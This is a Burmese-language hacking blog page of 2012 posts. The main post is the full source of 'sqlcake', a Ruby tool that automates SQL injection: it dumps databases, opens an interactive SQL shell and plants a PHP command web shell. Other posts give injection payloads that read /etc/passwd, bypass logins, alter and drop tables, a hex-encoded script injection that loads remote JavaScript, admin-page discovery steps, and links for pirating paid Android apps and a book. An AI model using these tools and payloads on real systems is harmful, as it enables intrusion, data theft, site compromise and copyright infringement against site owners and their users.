Monday, May 28, 2012

sql cake for SQL auto exploitation kit


This is posted by Dongoth.....
Thank to MHF

ဒီ script ကိုသံုးဖို ့ဆို
1) စက္ထဲမွာ ruby language ကို install လုပ္ရပါမယ္...
2) dir ဆီမွန္ေအာင္ cmd box ကေနသြားလိုက္ယံုပါပဲ ..


Code

#!/usr/bin/ruby

# sqlcake _ sql auto exploitation kit _ v1.1b
# written by impuls <impuls23@safe-mail.net>
# http://impuls23.edublogs.org
#
# automatic dump database & interactive sql shell tool
# dumps the current database structure including
# tables and columns and turns into an interactive
# mysql prompt. mysql specific special commands are:
#
# hex:[str]       => to sql-hex a string for magic quotes bypassing, e.g. hex:hello
# dropshell:[str] => drops a php shell (param x) (magic quotes must be deactivated),
#                 => e.g. dropshell:/var/www/exec.php | /exec.php?x=ps
# dump:[str]      => to dump a specific table, e.g. dump:mysql.users
# blind:[on/off]  => toggle blind sql injection mode
#
# parameter setup:
#
# -u => set target URI ["http://www.example.com/x.php?id=2&cat=5"]
# -p => set target parameter ["id"]
# -e => set error string for union selecion ["_fetch"]
# -d => set error escape string [" /*"]
# -b => use blind sql injection mode
# -f => write data to output file
# -x => skip database dump


require 'getoptlong'
require 'net/http'

print %q!

       _________________________________
      /                                 \
           sql auto exploitation kit
      \_________________________________/

             version: v1.1b (beta)


!


opts = GetoptLong.new(
  ["--help", "-h",     GetoptLong::NO_ARGUMENT],
  ["--uri", "-u",      GetoptLong::REQUIRED_ARGUMENT],
  ["--param", "-p",    GetoptLong::OPTIONAL_ARGUMENT],
  ["--error","-e",     GetoptLong::OPTIONAL_ARGUMENT],
  ["--delim", "-d",    GetoptLong::OPTIONAL_ARGUMENT],
  ["--file", "-f",     GetoptLong::NO_ARGUMENT],
  ["--blind", "-b",    GetoptLong::NO_ARGUMENT],
  ["--skipdump", "-x", GetoptLong::NO_ARGUMENT]
)

@params = Hash.new()

opts.each do |opt, arg|
  @params["#{opt}"] = arg
end


def get(uri)

  uri = URI(URI.encode(uri))
  res = Net::HTTP.get_response(uri)
  uri = res.body
  return uri
end


def get_data(uri, ident, query)
 
  target = uri.gsub(/\+(.+)?(#{ident})/,"+\\1" +
  "(SeLeCT+CoNcAt(0x3A,0x21,0x21,0x7B,0x7B,0x7B,(#{query})," +
  "0x7D,0x7D,0x7D,0x21,0x21,0x3A,0x0D,0x0A))")
  return get(target).scan(/:!!{{{(.*)}}}!!:/).uniq.join
end


def get_data_blind(uri, query)
 
  true_resp = get(uri + "+aNd+1=1" + @escape_str)
 
  i = 0
 
  while 1
    resp = get(uri + "+aNd+(SeLeCT+leNgTh((#{query}))=#{i})" + @escape_str)
    if (resp == true_resp)
      break
    else
      i += 1
    end
  end
 
  length = i + 1
  curpos = 1
 
  val = String.new()
 
  sql = "+aNd+(SeLeCT+aScii(suBstRiNg("
 
  while curpos < length
   
    resp = get(uri + sql + "(#{query}),#{curpos},1))<51)" + @escape_str)
   
    if(resp == true_resp)
      i_s = 0
      i_e = 51
    else
      resp = get(uri + sql + "(#{query}),#{curpos},1))<101)" + @escape_str)
      if(resp == true_resp)
        i_s = 50
        i_e = 101
      else
        resp = get(uri + sql + "(#{query}),#{curpos},1))<151)" + @escape_str)
        if(resp == true_resp)
          i_s = 100
          i_e = 151
        else
          resp = get(uri + sql + "(#{query}),#{curpos},1))<201)" + @escape_str)
          if(resp == true_resp)
            i_s = 150
            i_e = 201
          else
            i_s = 200
            i_e = 255
          end
        end
      end
    end
   
    while(i_s < i_e)
      resp = get(uri + sql + "(#{query}),#{curpos},1))=#{i_s})" + @escape_str)
      if (resp == true_resp)
        print i_s.chr
        val += i_s.chr
        curpos += 1
        break
      else
        i_s += 1
      end
    end
  end
  puts "\n"
  return val
end


def hex_str(str)
 
  chars = str.split(/ */)
  hex_val = "0x"
  chars.each do |c|
    hex_val += c.ord.to_s(16)
  end
 
  return hex_val
end


def dump_columns(uri, ident, table)
 
  i = 0
 
  if table.match(/\./)
    schema = hex_str(table.scan(/^(.*)\./).join)
    table  = hex_str(table.scan(/\.(.*)$/).join)
    while 1
      if (@bm == 1)
        res = get_data_blind(uri, "SeLeCT+CoNcAt(table_schema,0x2E,table_name,0x2E,column_name)" +
        "FrOm+information_schema.columns+WhErE+table_schema+=+#{schema}+aNd+" +
        "table_name+=+#{table}+LiMiT+#{i},1")
      else
        res = get_data(uri, ident, "SeLeCT+CoNcAt(table_schema,0x2E,table_name,0x2E,column_name)" +
        "FrOm+information_schema.columns+WhErE+table_schema+=+#{schema}+aNd+" +
        "table_name+=+#{table}+LiMiT+#{i},1")
      end
      if res.length > 1
        @columns << res
        puts res
        write_logfile(res + "\n") if @lfname
        i += 1
      else
        break
      end
    end
  else
    table = hex_str(table)
    while 1
      if (@bm == 1)
        res = get_data_blind(uri, "SeLeCT+CoNcAt(table_schema,0x2E,table_name,0x2E,column_name)" +
        "FrOm+information_schema.columns+WhErE+table_name+=+#{table}+LiMiT+#{i},1")
      else
        res = get_data(uri, ident, "SeLeCT+CoNcAt(table_schema,0x2E,table_name,0x2E,column_name)" +
        "FrOm+information_schema.columns+WhErE+table_name+=+#{table}+LiMiT+#{i},1")
      end
      if res.length > 1
        @columns << res
        puts res
        write_logfile(res + "\n") if @lfname
        i += 1
      else
        break
      end
    end
  end
end


def dump_information_schema(uri, ident)
 
  i = 0
   
  while 1
    if (@bm == 1)
      res = get_data_blind(uri, "SeLeCT+CoNcAt(table_schema,0x2E,table_name)" +
      "FrOm+information_schema.tables+WhErE+table_schema+!=+" +
      hex_str("information_schema") +
      "+LIMIT+#{i},1")
    else
      res = get_data(uri, ident, "SeLeCT+CoNcAt(table_schema,0x2E,table_name)" +
      "FrOm+information_schema.tables+WhErE+table_schema+!=+" +
      hex_str("information_schema") +
      "+LIMIT+#{i},1")
    end
    if res.length > 1
      @tables << res
      puts res if (@bm < 1)
      write_logfile(res + "\n") if @lfname
      i += 1
    else
      break
    end
  end 
end


def dump_data(uri, ident, table)
 
  dfields = []
 
  i = 0
 
  @columns.each do |c|
    if c.match(/#{table}\.(.*)$/)
      dfields << $1
      i += 1
    end
  end
 
  if (i > 0)
 
    puts dfields.join(":")
    write_logfile(dfields.join(":") + "\n\n") if @lfname
    print "\n\n"
   
    i = 0
   
    while 1
      if (@bm == 1)
        res = get_data_blind(uri, "SeLeCT+CoNcAt(" + dfields.join(",0x3A,") +
        ")+FrOm+#{table}+LiMiT+#{i},1")
      else
        res = get_data(uri, ident, "SeLeCT+CoNcAt(" + dfields.join(",0x3A,") +
        ")+FrOm+#{table}+LiMiT+#{i},1")
      end
      if res.length > 1
        @columns << res
        puts res
        write_logfile(res + "\n") if @lfname
        i += 1
      else
        break
      end
    end
  end
end


def drop_php_shell(uri, ident, path)
 
  target = uri.gsub(/\+(.+)?(#{ident})/,"+\\1" +
  "(SeLeCT+0x3C3F706870207072696E7420223C7072" +
  "653E223B73797374656D28245F4745545B2778275D" +
  "293B3F3E3C212D2D)")
 
  target += "+INTO+OUTFILE+'#{path}'"
 
  get(target)
end


def get_ident(uri, ident)
 
  i = 0
  ident = ident.to_i
  while i < ident
    target = uri.gsub(/\+(.+)?(#{i})/,"+\\1CoNcAt" +
    "(0x3A,0x21,0x21,0x21,0x3A,0x7B,0x21,0x7D,0x3A,0x21,0x21,0x21,0x3A)")
    if get(target).match(/:!!!:{!}:!!!:/)
      return i.to_s
      break
    end
    i += 1
  end
end


def run_sql_shell(uri, ident)
 
  while 1
    print "mysql> "
    cmd = STDIN.gets.chop
    break if cmd == "quit"
    if cmd.match(/^hex:(.*)/)
      puts hex_str($1)
    elsif cmd.match(/^dropshell:(.*)/)
      drop_php_shell(uri, ident, $1)
    elsif cmd.match(/^blind:(.*)/)
      if($1 == "on")
        @bm = 1
        puts "Blind mode is ON!"
      else
        @bm = 0
        puts "Blind mode is OFF!"
      end
    elsif cmd.match(/^dump:(.*)/)
      if (@tables.length > 0)
        dump_columns(uri, ident, $1)
        dump_data(uri, ident, $1)
      else
        puts "No database structure available!"
      end
    else 
      if (@bm == 1)
        get_data_blind(@default_uri, cmd)
      else
        puts get_data(uri, ident, cmd)
      end
    end 
  end
end


def move_param(uri, param)
 
  val = uri.scan(/((&)|(\?))(#{param}=.[0-9a-zA-Z.,:;\/\\-_+{}\[\]*%~!?|<>^=]*)/).join.gsub("&&","").gsub("??","")

  if uri.match(/#{val}$/)
    return uri
  else
    uri = uri.gsub(/#{val}(&)?/, "") + "&#{val}"
    return uri
  end
end


def exploit_sql(uri)
 
  if(!uri.match(/^http(s)?:\/\//))
    uri = "http://" + uri
  end
 
  if(@params["--param"])
    uri = move_param(uri, @params["--param"])
  end
 
  @default_uri = uri

  err   =  @error_resp
  esc   =  @escape_str
  uri  +=  "+UnIOn+SeLeCT+"                                                     
  val   =  "1"
  res   =  err
 
  puts "[*] Writing data to #{@lfname}" if (@lfname)
 
  if (@bm != 1)
    print "[*] Getting column count..."
   
    while (res.match(err))
        val += "\x2C" + (val.match(/\d\d?\d?$/)[0].to_i.next).to_s
        res = get(uri + val + esc)   
    end
   
    uri += val
    print "\n"
    puts  "[*] Target URI: " + @default_uri
    print "[*] Searching identifier..."
    ident = get_ident(uri, val.match(/(\d*)$/)[0].to_s)
    print "\n"
   
    if (ident == nil)
      puts "[*] Can't find identifier (#{err})"
      puts "[*] Using blind SQL injection mode\n\n"
      @bm = 1
    end
   
    puts "[*] Using identifier: " + ident + "\n\n" if (ident != nil)
  else
    puts "[*] Using blind SQL Injection mode\n\n"
  end
 
 
  if(@skip_db_dump < 1)
   
    puts "[*] Dumping tables...\n\n"
   
    if (@bm == 1)
      dump_information_schema(@default_uri, 0)
    else
      dump_information_schema(uri, ident)
    end

  end

  run_sql_shell(uri, ident)
end


def create_logfile()

  @lfname = "sqlcake_" + Time.now.strftime("%Y-%m-%d-%H%M%S") + ".txt"
 
  File.open(@lfname, "w") do |f|
    f.print "SQL AXP started at #{Time.now}\n\n"
  end
end


def write_logfile(data)

  if(@lfname)
    File.open(@lfname, "a") do |f|
      f.print data
    end
  end
end


def help()

print %q!sqlcake _ sql auto exploitation kit _ v1.1b
written by impuls <impuls23@safe-mail.net>

automatic dump database & interactive sql shell tool
dumps the current database structure including
tables and columns and turns into an interactive
mysql prompt. mysql specific special commands are:

hex:[str]       => to hex a string for magic quotes bypassing, e.g. hex:hello
dropshell:[str] => drops a php shell (param x) (magic quotes must be deactivated),
                => e.g. dropshell:/var/www/exec.php | /exec.php?x=ps
dump:[str]      => to dump a specific table, e.g. dump:mysql.users
blind:[on/off]  => toggle blind sql injection mode

parameter setup:

-u => set target URI ["http://www.example.com/x.php?id=2&cat=5"]
-p => set target parameter ["id"]
-e => set error string for union selecion ["_fetch"]
-d => set error escape string [" /*"]
-b => use blind sql injection mode
-f => write data to output file
-x => skip database dump

!

exit 0
end

@skip_db_dump = 0
@bm = 0

@error_resp = @params["--error"] || "_assoc"
@escape_str = @params["--delim"] || "\x20\x2D\x2D"

@tables  = []
@columns = []

if (!@params["--uri"])
  help()
end

if (@params["--help"])
  help()
end

if (@params["--file"])
  create_logfile()
end

if (@params["--blind"])
  @bm = 1
end

if (@params["--skipdump"])
  @skip_db_dump = 1
end

exploit_sql(@params["--uri"]) 

sqlcake.rb ( extension rb ဆိုတာမေမ့ပါနဲ ့)

အက်ယ္ကိုေအာက္ပါလင့္တြင္သြာၾကည့္ႏိုင္ပါသည္......။
http://mmhackforums.noonhost.com/sql-cake-for-sql-auto-exploitation-kit-vt730.html
Read More ->>

How to Install Paid Android Applications For Free







Android Tablet တစ္လံုး အသစ္၀ယ္လာတာနဲ႕ ဘာအလုပ္မွမလုပ္ပဲ အဲ့ဒါပဲ ႏႈိက္ေနတာ စာလည္း မဖတ္ အလုပ္လည္း မလုပ္ပဲ ကလိေနေတာ့ အိမ္ကေတာင္ မ်က္ေစာင္းထိုးေနျပီ ေစ်းကလည္း တစ္သိန္းေက်ာ္ပဲ ဆုိေတာ့ ကလိေပ်ာ္ပါတယ္ ထံုးစံအတုိင္း Android နယ္ပယ္မွာလည္း Hacking ကုိ ကလိလိုက္ခ်င္ေသးတယ္ :-D
ကဲ အလကားမေပးတဲ့ Application ေတြကို ပိုက္ဆံမေပးပဲရေအာင္ ၾကံရေအာင္
သိပ္ခက္ခက္ခဲခဲၾကီးေတာ့ မဟုတ္ပါဘူး Application တစ္ခု ခံျပီး သြင္းရံုပါပဲ.. Application နာမည္ကေတာ့
Applet Market ပါ သူက ပိုက္ဆံေပးရတဲ့ Application ေတြကို အခမဲ့ ေပးတဲ့ Service တစ္ခုပါပဲ Download & Install တန္းလုပ္ရံုပါပဲ Applet Market ကိုေတာ့ ပံု မွာပဲ Click ျပီး Download လုပ္ႏိုင္ပါတယ္


သူ႕လုိပဲ အလုပ္လုပ္တဲ့ Application ကေတာ့ Black Market ပါ အသံုးျပဳပံုလည္း မကြာပါ ေအာက္မွာ Download လုပ္ႏုိင္ပါတယ္


စမ္းၾကည့္ရင္ အဆင္ေျပမယ္ထင္ပါတယ္ ေနာက္တစ္ေန႕ေတာ့ Hacking နဲ႕ပတ္သတ္တဲ့ Android Application ေတြရွာျပီး ေပးပါ့မယ္ Download Link ေတြက သိပ္အဆင္မေျပေသးလို႕ စုေနပါတယ္ Android Tips & Trick ကေလးေတြလည္း တင္ျဖစ္မယ္ထင္ပါတယ္

source by ghostarea.net
Read More ->>

Saturday, May 26, 2012

2 Sql injection tutorials By Ghost Area


This Post is copied from www.ghostarea.net


SQL Injection Ultimate Tutorial

SQL Injection ဆိုတာ MySql DataBase ထဲက User Data ေတြကို Inject လုပ္ႏုိင္တဲ့ Vulnerability တစ္ခုပါ SQL Injection အေၾကာင္းမေျပာခင္ MySQL DataBase ဆိုတာ ဘာ SQL ဆိုတာ ဘာ ဆိုတာအရင္ၾကည့္ရေအာင္
DataBase ဆိုတာကေတာ့ ရွင္းပါတယ္ Data အစုအေ၀းေပါ့
SQL ဆုိတာကေတာ့ Structure Query Language လို႕ေခၚတဲ့ Language တစ္ခုျဖစ္ျပီး Data ေတြကို သိမ္းဆည္ဖို႕ စီစဥ္ဖို႕ အထူးျပဳေရးဆြဲထားေသာ Language တစ္ခုျဖစ္ပါတယ္ ။
MySql ဆုိတာကေတာ့ ခုနက SQL Language ကို အသံုးျပဳျပီး ေရးသားထားေသာ နာမည္ေက်ာ္ DataBase Management System ေတြထဲက နာမည္အၾကီးဆံုး Open Source DataBase Management System တစ္ခုျဖစ္ပါတယ္
MySql မွာ Data ေတြကို Table မ်ားျဖင့္ ထားရွိပါတယ္ Tabel ထဲကမွ Column , Roll ဆိုျပီး ထပ္ခြဲထားပါေသးတယ္ ဥပမာ

No. First Name Second Name
1 Negative Thunder
2 Ghost Area
3 John Smith

ဆိုျပီး ဒီလိုထားပါတယ္ အဲ့ဒီ့ Tabel နာမည္ကို Hacktivism လို႕ထားရေအာင္
Query ဆုိတာကေတာ့ အဲ့ဒီ့ Table ထဲက Data ေတြကို ေတာင္းခံတဲ့ Request ေတြျဖစ္ပါတယ္ Select* ဆုိတာနဲ႕စျပီး Sql Language ရဲ႕ အဓိက Operation တစ္ခုျဖစ္ပါတယ္ ဥပမာ Query တစ္ေၾကာင္းကို ၾကည့္ရေအာင္
SELECT * FROM Hacktivism WHERE Second_Name=’Thunder’;
ဒီလို Query ေရးလိုက္ရင္ Negative Thunder ရဲ႕ Data ေတြ လက္ခံရရွိပါလိမ့္မယ္ ။ ဒါဆိုရင္ေတာ့ SQL နဲ႕ Query ေတြအေၾကာင္း နည္းနည္းသိသြားေလာက္ပါျပီ
ဒါဆို SQL Injection အေၾကာင္း ဆက္ရေအာင္ 
SQL Injection ဆိုတာ User Input ကို ေကာင္းစြာ Filter လုပ္မထားေသာ Developer ရဲ႕ အမွားက တစ္ဆင့္ User Data ေတြကို Inject လုပ္ျခင္းပါ
ပထမဆံုး Vuln ျဖစ္ပံု ေတြနဲ႕ Exploit Code နမူနာနဲ႕ Attacking လုပ္ပံုေတြကို တစ္ခ်က္ၾကည့္ရေအာင္ 
exploit.php ရဲ႕ Code ကေလးတစ္ခ်က္ၾကည့္ရေအာင္
<?php
$id = $_GET['id'];
$result = mysql_query( “SELECT name FROM members WHERE id = ‘$id’”);
?>

ၾကည့္လိုက္ရင္ သိသာပါတယ္ User Input တစ္ခုျဖစ္တဲ့ id ကို Filter လုပ္ထားျခင္းမရွိပါ ဒီေတာ့ 
http://site.com/exploit.php?id=1+union+all+select+1,null,load_file(‘e tc/passwd’),4–
ဆိုျပီး Browser က တစ္ဆင့္ Request ေတာင္းလိုက္ရင္ ect/passwd Directory က passwrd File တက္လာပါ့မယ္ ဒါကို Out File Injection လုိ႕လည္း ေခၚပါေသးတယ္ ( ခုနက Request မွာသံုးသြားတဲ့ union ဆိုတာကေတာ့ select statement တစ္ခုထက္ပိုျပီး သံုးခ်င္တဲ့အခါမွာသံုးပါတယ္ , load_file ဆုိတာကေတာ့ Server ထဲက File ကို Load လုပ္လိုက္တာပါ )
ဒုတိယ တစ္မ်ိဳးၾကည့္ရေအာင္ပါ .

ဒီတစ္ေခါက္ေတာ့ exploit2.php ရဲ႕ Code ေပါ့
$postsender = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postsender’ AND password = ‘$postpass’”)
or die(“<p>” . mysql_error() . “</p>\n”);


သူ႕မွာလည္း Variable ေတြကို ေသခ်ာဂရုမစိုက္ထားျပန္ဘူး ဒီတစ္ခါေတာ့
username:a or 1=1–
password:blank


ဒီလို Inject လုပ္လုိက္တဲ့အခါမွာ သြားတဲ့ Sql Query က ဒီလိုျဖစ္သြားပါလိမ့္မယ္
SELECT USER from database WHERE
username=’a’ or 1=1


ဒီလိုဆို 1=1 က true or true ျဖစ္ျပီး User Access ကိုလက္ခံသြားပါလိမ့္မယ္...


SQLI Part 2 : Attacking Examples

Part 1 : မွာေတာ့ SQL ဆိုတာဘာ MySQL ဆိုတာ ဘာ Query ေတြအေၾကာင္း နဲ႕ Attacking Example ႏွစ္ခုကို ေရးခဲ့ပါတယ္ ဒီေန႕ေတာ့ အျခားေသာ Attacking Example ေတြနဲ႕ Exploit ေတြကို ဆက္ပါ့မယ္ ။
ဒီ Tutorial မွာေတာ့ URL Bar မွာမဟုတ္ပဲ User Input ထည့္ခြင့္ရေသာ ေနရာမွန္သမွ် မွာ Inject လုပ္မယ့္ Attacking Mode ေတြကို Example ေတြနဲ႕ ေျပာျပပါ့မယ္ ။ ဥပမာ Search Box လိုေနရာမ်ိဳး Email Address Input လုပ္ရတဲ့ေနရာလိုမ်ိဳးမွာေပါ့
Shopping Site တစ္ခုရဲ႕ Search Form ဆိုပါစို႕ အဲ့ဒီ့ Search Form ဟာ ေစ်း၀ယ္တဲ့ User ေတြ ၀ယ္လို႕တဲ့ကုန္ပစၥည္းကို ရွာေဖြဖို႕လုပ္ထားတာပါ ဒါေပမယ့္ အဲ့ဒီ့ Search Form ဟာ Filter ခံဖို႕ လြတ္ေနပါတယ္ ဥပမာ ဒီလိုေပါ့
if (txtFilter.Text.Length > 0)(
strSQL += ” WHERE ProductName Like ‘” + txtFilter.Text + ‘”;)

အဲ့ဒါဆိုရင္ Attacker က
milk’ UNION Select 0, username,password 0 from users –

ဒီလို Query ေရးလိုက္ရင္ ( milk ဆိုတာ Example Item ပါ ) User Name Password ေတြ တက္လာပါလိမ့္မယ္ ။


 

အဲ့ဒီလိုပဲအျခားေသာ Attack အေနနဲ႕
4.Updating Table
ဒီတစ္ခါေတာ့ DataBase Table ၾကီးကို Update လုပ္ပစ္ပါ့မယ္ ဥပမာ.
milk’ ; UPDATE site_database SET site_email = ‘admin@site.com’ WHERE email =’attacker@email.com; –
ဒါကေတာ့ Example ပဲျပတာပါ site_email က Website Admin Mail ကို Attacker ေမးလ္ကို ေျပာင္းပစ္တဲ့ Example ပါ
အဲ့ဒီလို Inject လုပ္ရင္ Query မွာ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email = ‘milk’ ; UPDATE site_database SET site_email = ‘admin@site.com’ WHERE email =’attacker@email.com; –
ဒီလို Request ျဖစ္သြားတာေၾကာင့္ Table Update ျဖစ္သြားပါတယ္
5.Adding New Record
ဒီတစ္ခါေတာ့ DataBase မွာ Record အသစ္ထည့္မွာပါ
milk’;INSERT INTO site_customers (‘site-email’,site-password’,'site-login_id’,site-lastname’) VALUES (‘attcker@email.com’,'hello’,'attacker’,'hacking attacker’);–
site_customer ထဲကို Attacker ဟာ သူ႕ရဲ႕ Record ေတြထည့္လုိက္တဲ့ Injecting Code ပါ အဲ့ဒီလို Inject လုပ္လုိက္ရင္ Query မွ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’;INSERT INTO site_customers (‘site-email’,site-password’,'site-login_id’,site-lastname’) VALUES (‘attcker@email.com’,'hello’,'attacker’,'hacking attacker’);–
ျဖစ္ျပီး Record တစ္ခု ထပ္ထည့္ျပီးသားျဖစ္သြားပါလိမ့္မယ္ ။
6.Identifying Table
ဒီတစ္ခါေတာ့ Table တက္လာေအာင္လုပ္ၾကည့္ရေအာင္ ။
milk’ AND 1=(SELECT COUNT(*) FROM mytable); –

ဒီ Code ကိုသာ Inject လုပ္မယ္ဆုိရင္ Query မွာ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’ AND 1=(SELECT COUNT(*) FROM mytable); –
လို႕ Request လုပ္ျပီး Table ေတြတက္လာပါလိမ့္မယ္
7.Deleting Table
ဒီတစ္ခါေတာ့ Tabel ကို Delete လုပ္မွာပါ
milk’DROP TABLE Creditcard; –

ဒီ Code ကိုသာ Inject လုပ္လုိက္ရင္ SQL Query က
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’DROP TABLE Creditcard; –

လို႕ Request လုပ္သြားျပီး Table ကို Delete လုပ္သြားပါ့မယ္

 

Read More ->>

Social Engineering Hacking (myanmar e-book)


ကၽြန္ေတာ့္ေဘာ္ဒါ Ethickiddie ရဲ႕ ေနာက္ဆံုးထြက္စာအုပ္ပါ.....။ social engineering ကိုနားလည္ခ်င္သူမ်ားအတြက္ လက္ေဆာင္ေကာင္းတစ္ခုပါပဲ...........။ေအာက္ပါလင့္ကေနေဒါင္းလိုက္ပါ...

http://www.mediafire.com/view/?woeuv8d66obb0hc
Read More ->>

Saturday, May 19, 2012

Ghost in the wire : Ken Mitnick



ဟိုတစ္ေန႕က India က စကားေျပာေနတဲ့ တစ္ေယာက္နဲ႕ စကားေျပာရင္း သူ႕ဆိုဒ္ကိုလာျပတယ္ ဒါနဲ႕ သူ႕ဆုိဒ္မွာ ဟိုေမႊဒီေမႊလုပ္ရင္း Ghost in the Wire ကိုအလကားေပးထားတာေတြ႕တယ္ စာအုပ္ကို ဖတ္ခ်င္ေနတာၾကာပါျပီ Amazon မွာ စထြက္တုန္းက ၂၅ ေဒၚလာဆိုလို႕ မ၀ယ္တာ အခု အလကားရျပီးမွ ျပန္သြားၾကည့္လိုက္ေတာ့ ၁၁ ေဒၚလာပဲရွိတယ္ မ၀ယ္ေတာ့ပါဘူး တကယ္လို႕ ၀ယ္ခ်င္သူမ်ားေတာ့
http://www.amazon.com/Ghost-Wires-Adventures-Worlds-Wanted/dp/0316037702
မွာသြား၀ယ္ႏုိင္ပါတယ္ အခု ကၽြန္ေတာ္တင္ေပးဖုိ႕ေတာင္ နည္းနည္းစဥ္းစားမိတယ္ သူမ်ား စီးပြားေရးမ်ား တုတ္နဲ႕ထုိးသလိုမ်ားျဖစ္ေနမလားလို႕..အရင္ က အဲ့ေလာက္မဟုတ္ေပမယ့္ Ubuntu စသြင္းျပီးကတည္းက License ေတြ ကို နည္းနည္း အားနာလာမိတယ္ Software Cracking လုပ္ခ်င္လို႕ Ubuntu ပဲရွိတဲ့ Laptop မွာ Window တြဲတင္ဖို႕ကို License Version ၀ယ္ဖို႕ မတတ္ႏုိင္လို႕ တြန္႕ေနတာ ( တင္ေတာ့ တင္ရမွာပဲ မတတ္ႏုိင္ဘူး နည္းနည္း လြတ္ေအာင္ Virtual Box နဲ႕ပဲတင္မလားလို႕) :-D ဒါေပမယ့္ လည္း ကၽြန္ေတာ္က စီးပြားေရးအရ လုပ္ေနတာမဟုတ္ပဲ Sharing လုပ္ေနတာဆိုေတာ့ Ken Mitnick ၾကီးခြင့္လႊတ္ေကာင္းပါရဲ႕
စာေမးပြဲေၾကာင့္ အစအဆံုးဖတ္ႏုိင္ျခင္းမရွိေသးပါဘူး :-D ဟီး ဟိုလွန္ဒီလွန္လုပ္ရင္း လိုက္ၾကည့္ေနရတံုးရွိပါေသးတယ္  သူ႕ဘ၀ဇာတ္ေၾကာင္းေလးကို ပံုေလးေတြပါထည့္ေပးထားတာေတြ႕ရပါတယ္
Download လုပ္ဖို႕ေတာ့ ပံုကိုပဲ Click လိုက္ရင္ အဆင္ေျပသြားပါျပီ ^_^


SOURCE BY WWW.GHOSTAREA.NET
Read More ->>

Monday, May 14, 2012

How to change manual injection to auto sql injector



ကိုတုတ္ေကာက္ေရးသာထားတာျဖစ္ပါတယ္.......။ဒီပိုစ့္ကို ေကာ္ပီပိုစ့္အျဖစ္မသတ္မွတ္ေစခ်င္ပါဘူး....ဘာလို႕
လဲဆိုေတာ့ဒီ Tutorial ကို ကၽြန္ေတာ္က စုေဆာင္းသိမ္းထားခ်င္လို႕ ဆိုက္ေပၚတင္ထားလိုက္တာပါ...။
ေရးသာသူကိုတကယ္ ေက်းဇူးတင္ပါတယ္...........။

How to change manual injection to auto sql injector !

ေခါင္းစဥ္ အရေတာ့ ဘာမွန္းမသိၿဖစ္ေနမွာပဲ :laugh2: .. let's start the show.. ok :laughingneqw:

column ရွာတာေလာက္ေတာ့ သိၾကမယ္ထင္ပါတယ္... ခုေအာက္က ေဖာက္မယ့္ ဆိုက္ဒ္မွာ ၁၁ခုရွိတယ္.. ဘယ္ဟာ vul ၿဖစ္ေနမလဲဆိုတာကိုဆက္ရွာပါမယ္....
[x] step-1


vul ၿပေနတဲ့ 4 ေနရာမွာ .. ေအာက္က code ကိုအစားထိုးလိုက္ပါမယ္...

%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29
[x] step-2
 ကဲ .. code က load ေခၚလိုက္တဲ့အတြက္ ... auto injector ကဝင္လာပါၿပီ .. ကလစ္ေလးေတြေထာက္ၿပီး .. information ေတြဆက္ယူၾကရံုပါပဲ ...

[x] step-3

 table ေတြဆြဲထုတ္တာပါ ... have fun with auto injector .. :dance2: :dance2:
က်ေနာ္က chrome သမားမို ့လို ့ chrome နဲ ့ပဲ စမ္းထားတာပါ ..
note : ဘယ္ HF ဘယ္ abh ကမွမဟုတ္ပါဖူး..priv8 ..
code credit to my fri....


source from MHF
Read More ->>

How to find admin page of a site


Website တစ္ခုရဲ႔ admin user / pass ရျပီဆိုပါစို႔...admin page ကိုဘယ္လိုရွာမလဲ...ဒီေအာက္က နည္းေလးေတြသံုးျပီးရွာမယ္ေနာ္...80% ေတာ႔ အာမခံပါတယ္... 

နံပါတ္တစ္ - url add ပါမယ္... www.site.com ဆိုပါစို႔...တစ္ခ်ိဳ႔ဆိုဒ္ေတြက သူ႔ index page မွာတင္ login ၀င္ဖို႔ပါတတ္တာကို မေတြ႔ဘဲ စြတ္စပ္ရွာတတ္ၾကပါတယ္....ဒါေၾကာင္႔မို႔ ပထမဆံုး index ကို ေသခ်ာျပန္စစ္ပါ...ေနာက္ .com ေနာက္မွာ ေအာက္ကပံုစံအတိုင္းလိုက္စစ္ပါ....
www.site.com/admin
www.site.com/administrator
www.site.com/login
www.site.com/admin.php
www.site.com/admin.asp
www.site.com/wp-login.php
ဒါနဲ႔ပထမဆံုးစစ္ပါ...မေတြ႔ဘူးဆိုပါစို႔...ေနာက္တစ္မ်ိဳးနဲ႔ထပ္စစ္ပါမယ္...

နံပါတ္ႏွစ္ - Online Scanner သံုးပါမယ္...လြယ္လြယ္ကူကူ tool ေတြ ဘာေတြသြင္းေနရတာ ရႈပ္ေသးတယ္...ရလို ရျငား online acp finder နဲ႔အရင္စမ္းပါမယ္...ဒီမွာ ကၽြန္ေတာ္ဘာသံုးေလ႔ရွိတုန္းဆို ကၽြန္ေတာ္ကေတာ႔ တုတ္ေကာက္ကို သံုး အဲေလ.....
www.dongoth.com/acp.php
ကိုသံုးပါတယ္ဗ်ာ....လိုင္းအထိုက္အေလ်ာက္ရွိရင္ ဒီေကာင္ စစ္တာ ေတာ္ေတာ္ျမန္ပါတယ္... လိုင္းမရွိရင္ေတာ႔ ဘာမွကို မတက္တာ.... ဟီး...  
ဒါလည္း မဟန္ဘူးဆိုပါစို႔...ေနာက္တစ္ဆင္႔ဗ်ာ....

နံပါတ္သံုး - Tool အေသးစားေလးေတြ လြယ္လြယ္ကူကူ Admin Page Finder ေတြသံုးပါမယ္... Havij ေပါ႔ဗ်ာ... Havij ကို 

မွာ download ဆြဲသံုးႏိူင္ပါတယ္...သူ႔ Havij Admin Page List မွာက 410 ပဲပါတယ္ဗ်...ဒီေတာ႔ Havij ကို extract လုပ္ျပီးရင္ admin.txt ထဲကို

